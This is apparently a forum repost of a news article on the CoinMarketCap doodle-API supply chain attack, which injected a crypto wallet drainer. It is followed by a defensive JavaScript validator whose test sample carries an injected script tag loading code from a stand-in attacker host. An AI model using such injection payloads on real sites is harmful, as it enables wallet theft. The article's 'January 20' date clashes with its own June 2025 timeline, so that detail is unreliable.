CoinMarketCap briefly hacked to drain crypto wallets via fake Web3 popup

Artifact 07-16-2025 08:57 AM

<div id="post_message_798967">
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/content/hl-images/2024/12/05/Cryptocurrency.jpg"/><br/>
<br/>
CoinMarketCap, the popular cryptocurrency price tracking site, suffered a website supply chain attack that exposed site visitors to a wallet drainer campaign to steal visitors' crypto.<br/>
<br/>
On Friday evening, January 20, CoinMarketCap visitors <a href="https://twitter.com/DarkWebInformer/status/1936209452878745680" target="_blank">began seeing Web3 popups</a> asking them to connect their wallets to the site. However, when visitors connected their wallets, a malicious script drained cryptocurrency from them.<br/>
<br/>
The company later confirmed threat actors utilized a vulnerability in the site's homepage "doodle" image to inject malicious JavaScript into the site.<br/>
<br/>
"On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected popup for some users when they visited our homepage," reads a statement <a href="https://x.com/CoinMarketCap/status/1936273633611334081" target="_blank">posted on X</a>.<br/>
<br/>
"Upon discovery, we acted immediately to remove the problematic content, identified the root cause, and comprehensive measures have been implemented to isolate and mitigate the issue."<br/>
<br/>
"We can confirm all systems are now fully operational, and CoinMarketCap is safe and secure for all users."<br/>
<br/>
Cybersecurity firm c/side explained that the attack worked by the threat actors somehow modifying the API used by the site to retrieve a doodle image to display on the homepage. This tampered JSON payload now included a <a href="http://web.archive.org/web/20250620230124/https://static.cdnkit.io/cmc/popup.js" target="_blank">malicious script tag</a> that injected a wallet drainer script into CoinMarketCap from an external site named "static.cdnkit[.]io".<br/>
<br/>
When someone visited the page, the script would execute and display a fake wallet connect popup showing CoinMarketCap branding and mimicking a legitimate Web3 transaction request. However, this script was actually a wallet drainer designed to steal connected wallets' assets.<br/>
<br/>
"This was a supply chain attack, meaning the breach didn't target CMC's own servers but a third-party tool or resource used by CMC," <a href="http://medium.com/@csideai/coinmarketcap-client-side-attack-a-comprehensive-analysis-by-c-side-ce0b58e77dec" target="_blank">explains c/side</a>.<br/>
<br/>
"Such attacks are hard to detect because they exploit trusted elements of a platform."<br/>
<br/>
More details about the attack came later from a threat actor <a href="https://x.com/ReyXBF/status/1936276263137574931" target="_blank">known as Rey</a>, who said that the attackers behind the CoinMarketCap supply chain attack shared a screenshot of the drainer panel on a Telegram channel.<br/>
<br/>
This panel indicated that $43,266 was stolen from 110 victims as part of this supply chain attack, with the threat actors speaking in French on the Telegram channel.<br/>
<br/>
<img alt="" border="0" class="bbCodeImage" src="https://www.bleepstatic.com/images/news/security/attacks/c/coinmarketcap/coinmarketcap/drainer-panel.jpg"/><br/>
<div style="margin:20px; margin-top:5px; ">
<!-- <div class="smallfont" style="margin-bottom:2px">Quote:</div> -->
<table border="0" cellpadding="6" cellspacing="0" width="100%">
<tr>
<td class="alt2" style="background: rgb(37, 37, 37) none repeat scroll 0% 0%; border: 1px solid rgb(0, 0, 0); border-radius: 5px; font-size: 11px; text-shadow: none;">

Screenshot of drainer panel shared on Telegram

</td>
</tr>
</table>
</div>As the popularity of cryptocurrency has boomed, so has the threat from wallet drainers, which are commonly used in attacks.<br/>
<br/>
Unlike traditional phishing, these types of attacks are more often promoted through social media posts, advertisements, spoofed sites, and malicious browser extensions that include malicious wallet-draining scripts.<br/>
<br/>
Reports indicate that <a href="https://www.bleepingcomputer.com/news/security/cryptocurrency-wallet-drainers-stole-494-million-in-2024/" target="_blank">wallet drainers stole almost $500 million</a> in 2024 through attacks targeting more than 300,000 wallet addresses.<br/>
<br/>
The problem has become so pervasive that <a href="https://www.bleepingcomputer.com/news/security/mozilla-launches-new-system-to-detect-firefox-crypto-drainer-add-ons/" target="_blank">Mozilla recently introduced a new system</a> to detect wallet drainers in browser add-ons uploaded to the Firefox Add-on repository.<br/>
<br/>
<a href="https://www.bleepingcomputer.com/news/security/coinmarketcap-briefly-hacked-to-drain-crypto-wallets-via-fake-web3-popup/" target="_blank">@ BleepingComputer </a>
</div>
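
The article describes a tampered JSON response from the doodle API that carried a script tag loading a drainer from an external host. As an added example (not code from the article, c/side or CoinMarketCap), here is a check that treats such a response as untrusted data before anything is rendered; the field names, allowlisted hosts and sample payloads are assumptions constructed for illustration.

```javascript
// Added example, not CoinMarketCap's code. Field names and allowlisted hosts
// are hypothetical; the real doodle API schema is not given in the article.
const EXPECTED_FIELDS = ["altText", "imageUrl", "link"];
const ALLOWED_HOSTS = {
  imageUrl: new Set(["static.example.com"]),
  link: new Set(["www.example.com"]),
};
// Any tag opener or javascript: URL marks a field as carrying active content.
const ACTIVE_CONTENT = /<\s*\/?\s*[a-z!]|javascript:/i;

function checkUrl(field, value, problems) {
  let url;
  try {
    url = new URL(value);
  } catch {
    problems.push(`${field}: not an absolute URL`);
    return;
  }
  if (url.protocol !== "https:") problems.push(`${field}: scheme ${url.protocol} not allowed`);
  if (!ALLOWED_HOSTS[field].has(url.hostname)) {
    problems.push(`${field}: host ${url.hostname} not allowlisted`);
  }
}

// Treat the API response as untrusted data: exact field set, strings only,
// no markup anywhere, and URLs pinned to known hosts over https.
function validateDoodle(payload) {
  if (payload === null || typeof payload !== "object" || Array.isArray(payload)) {
    return { ok: false, problems: ["payload is not an object"] };
  }
  const problems = [];
  for (const key of Object.keys(payload)) {
    if (!EXPECTED_FIELDS.includes(key)) problems.push(`${key}: unexpected field`);
  }
  for (const field of EXPECTED_FIELDS) {
    const value = payload[field];
    if (typeof value !== "string") {
      problems.push(`${field}: missing or not a string`);
      continue;
    }
    if (ACTIVE_CONTENT.test(value)) problems.push(`${field}: contains markup or active content`);
    if (field in ALLOWED_HOSTS) checkUrl(field, value, problems);
  }
  return { ok: problems.length === 0, problems };
}

// Constructed samples: a clean response and one carrying an injected script tag.
const CLEAN = { altText: "Summer doodle", imageUrl: "https://static.example.com/doodle.png", link: "https://www.example.com/events" };
const TAMPERED = { ...CLEAN, link: '"><script src="https://cdn.attacker.example/popup.js"></script>' };
console.log(validateDoodle(CLEAN), validateDoodle(TAMPERED));
```

A payload that passes should still be written to the page with `setAttribute` and `textContent` rather than `innerHTML`, and a `script-src` Content Security Policy limits what an injected tag could load if validation is bypassed.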

